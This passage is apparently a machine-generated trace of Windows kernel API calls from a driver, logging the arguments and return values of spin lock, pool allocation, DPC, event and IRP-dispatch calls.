| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x81, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77caf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76e79c, SpinLock_unk_out = 0xffffe0003a76e79c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76e79c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76e79c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76e79c, SpinLock_unk_out = 0xffffe0003a76e79c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76e79c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76e79c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7866dc, SpinLock_unk_out = 0xffffe0003a7866dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7866dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7866dc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7866dc, SpinLock_unk_out = 0xffffe0003a7866dc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7866dc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7866dc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x81, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77ca50 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7866dc, SpinLock_unk_out = 0xffffe0003a7866dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7866dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7866dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7866dc, SpinLock_unk_out = 0xffffe0003a7866dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7866dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7866dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76e97c, SpinLock_unk_out = 0xffffe0003a76e97c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76e97c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76e97c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76e97c, SpinLock_unk_out = 0xffffe0003a76e97c, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76e97c, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76e97c |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x81, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77c9b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76e97c, SpinLock_unk_out = 0xffffe0003a76e97c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76e97c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76e97c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76e97c, SpinLock_unk_out = 0xffffe0003a76e97c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76e97c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76e97c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766fe4, SpinLock_unk_out = 0xffffe0003a766fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766fe4, SpinLock_unk_out = 0xffffe0003a766fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766fe4, SpinLock_unk_out = 0xffffe0003a766fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766fe4, SpinLock_unk_out = 0xffffe0003a766fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766fe4, SpinLock_unk_out = 0xffffe0003a766fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
